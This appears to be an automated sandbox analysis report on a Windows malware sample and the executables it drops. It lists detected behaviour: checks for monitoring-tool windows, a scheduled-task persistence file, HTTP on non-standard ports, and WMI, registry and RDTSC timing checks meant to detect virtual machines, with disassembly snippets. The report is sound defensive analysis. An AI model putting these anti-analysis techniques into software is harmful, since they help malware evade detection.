Source: C:\Users\user\Desktop\TxTPu961er.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49993

Source: C:\Users\user\Desktop\TxTPu961er.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\TxTPu961er.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAA5B second address: 6BAA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAA60 second address: 6BAA6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BABE6 second address: 6BABEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BABEA second address: 6BABEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAE5A second address: 6BAE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAE62 second address: 6BAE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAE6C second address: 6BAE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7905119FB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAE78 second address: 6BAE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905006512h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BAE8F second address: 6BAE99 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7905119FCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BB298 second address: 6BB2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 ja 00007F790500650Ah 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007F7905006517h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F790500650Fh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7905006517h 0x00000025 jmp 00007F7905006518h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BB2F1 second address: 6BB2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BB2F5 second address: 6BB2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BDD6B second address: 6BDD71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BDD71 second address: 6BDD81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F790500650Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BDD81 second address: 6BDD85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6BDE35 second address: 6BDE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 60945000h 0x00000010 clc 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 jnp 00007F7905006509h 0x0000001b mov dx, D8DCh 0x0000001f push 00000003h 0x00000021 and dh, FFFFFFC4h 0x00000024 mov dword ptr [ebp+122D1B29h], ebx 0x0000002a push 8A17A07Dh 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F7905006518h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6CF868 second address: 6CF89A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7905119FC3h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7905119FC4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCFFF second address: 6DD005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DD005 second address: 6DD01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7905119FBCh 0x0000000a popad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DB9FE second address: 6DBA1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006512h 0x00000007 pushad 0x00000008 jnp 00007F7905006506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DBA1B second address: 6DBA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7905119FB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f jc 00007F7905119FB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DC09C second address: 6DC0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6AD100 second address: 6AD106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DC9D1 second address: 6DC9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DC9D6 second address: 6DC9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE4A second address: 6DCE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE4E second address: 6DCE58 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7905119FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE58 second address: 6DCE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F7905006506h 0x00000013 jmp 00007F7905006518h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE88 second address: 6DCE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE8C second address: 6DCE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE94 second address: 6DCE99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCE99 second address: 6DCEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905006517h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DCEB8 second address: 6DCED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F7905119FC0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6DFEB8 second address: 6DFEE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F7905006506h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007F7905006512h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F7905006506h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E0456 second address: 6E045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E0533 second address: 6E0539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E0539 second address: 6E053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E053E second address: 6E0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E0544 second address: 6E0548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E066F second address: 6E0674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
